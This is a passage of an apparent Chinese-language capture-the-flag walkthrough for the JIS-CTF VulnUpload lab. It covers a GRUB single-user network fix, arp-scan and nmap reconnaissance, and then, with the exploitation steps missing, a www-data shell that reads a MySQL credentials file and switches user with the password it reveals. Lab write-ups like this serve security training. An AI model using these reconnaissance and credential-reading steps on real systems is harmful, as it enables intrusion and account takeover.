Name: JIS-CTF: VulnUpload Date release: 8 Mar 2018 Author: Mohammad Khreesha Series: JIS-CTF
环境:kali2021、JIS-CTF在同一网段下(net模式)
注意:一开始ip查找,并没有找到,后来发现靶机的网卡并没有启动
修复方法:
进入bash 咋这个界面下安字母 ‘e’键
找到ro的位置
将其更改成 rw single init=/bin/bash
然后ctrl +x进入bash,输入ip a 查看网卡信息
查看网卡配置信息vim /etc/network/interfaces
将网卡名改成与之前ip a命令查看到的名称一致,然后重启网卡
输入 /etc/init.d/networking restart
之后就能成功获取到ip
信息搜集
arp-scan -l 查找目标192.168.32.129
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root💀kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:3a:85:4a, IPv4: 192.168.32.128 Startingarp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.32.1 00:50:56:c0:00:08 VMware, Inc. 192.168.32.2 00:50:56:f0:a6:e2VMware, Inc. 192.168.32.129 00:0c:29:c2:68:53 VMware, Inc. 192.168.32.254 00:50:56:f4:b7:bcVMware, Inc. 4 packetsreceivedbyfilter, 0 packetsdroppedbykernel Endingarp-scan 1.9.7: 256 hostsscannedin 1.861 seconds (137.56 hosts/sec). 4 responded ┌──(root💀kali)-[~] └─#
nmap -p- 192.168.32.129 查找开放端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(root💀kali)-[~] └─# nmap -p- 192.168.32.129 Starting Nmap 7.91 ( https://nmap.org ) at2021-08-2114:07 CST Nmap scan report for192.168.32.129 Host is up (0.00079s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:C2:68:53 (VMware)
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt <1:/var/www/html/uploaded_files$ cat /etc/mysql/conf.d/credentials.txt The 4th flag is : {7845658974123568974185412}
www-data@Jordaninfosec-CTF01:/var/www/html/uploaded_files$ su technawi su technawi Password: 3vilH@ksor technawi@Jordaninfosec-CTF01:/var/www/html/uploaded_files$